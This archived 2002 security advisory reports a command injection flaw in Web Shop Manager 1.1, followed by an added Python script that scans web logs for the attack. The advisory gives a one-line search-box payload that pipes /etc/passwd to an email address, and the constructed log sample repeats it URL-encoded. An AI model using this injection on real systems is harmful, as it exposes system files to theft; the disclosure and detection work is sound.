Web Shop Manager Security Vulnerability

From: Tacettin Karadeniz (tacettinkaradenizat_private)
Date: Thu Aug 15 2002 - 03:15:37 PDT


    Summary
    The Web Shop Manager
    (http://www.webscriptworld.com/scripts/wsm.phtml)
    allows you to manage a fully functional online store
    from a centralized web-based administration system. A
    security vulnerability in the product allows execution
    of arbitrary commands with the privileges of the
    script file used by the product.
    
    Details 
    Vulnerable systems:
     * Web Shop Manager version 1.1
    
    Exploit:
    It is possible to send the server's password file to
    any mail address by entering the following command in
    Web Shop Manager's search box:
    
     |mail userat_private < /etc/passwd
    
     
    
    
    
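As an added example (not part of the original advisory or the product's code), the following Python script scans web access logs for search requests whose decoded value begins with a pipe, the pattern shown in the exploit above. The log lines are constructed, and the script path and the `search` parameter name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the advisory). The
# script path and the "search" parameter name are hypothetical.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Aug/2002:03:20:01 -0700] "GET /cgi-bin/shop/search.cgi?search=blue+widget HTTP/1.0" 200 5120
192.0.2.44 - - [15/Aug/2002:03:21:17 -0700] "GET /cgi-bin/shop/search.cgi?search=%7Cmail+user%40example.test+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 312
192.0.2.10 - - [15/Aug/2002:03:22:40 -0700] "GET /cgi-bin/shop/search.cgi?search=cables+%7C+adapters&page=2 HTTP/1.0" 200 4890
"""

# Common Log Format: client, identity, user, timestamp, request line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# Characters a shell treats specially; a hit anywhere deserves a second look.
SHELL_META = re.compile(r"[|;&`$<>]")


def classify(value):
    """Return 'pipe-prefix', 'shell-meta' or None for one decoded value."""
    # A leading pipe matches the advisory's search-box input exactly.
    if value.lstrip().startswith("|"):
        return "pipe-prefix"
    # Metacharacters elsewhere may be benign text, so they rank lower.
    if SHELL_META.search(value):
        return "shell-meta"
    return None


def scan(log_text):
    """Return (line number, client, parameter, verdict, decoded value) tuples."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qsl URL-decodes each value, so %7C is seen as "|".
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                findings.append((lineno, client, name, verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET query strings are visible in an access log; searches submitted by POST need the same check applied to request bodies at the application or a proxy.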
    



    This archive was generated by hypermail 2b30 : Thu Aug 15 2002 - 10:54:36 PDT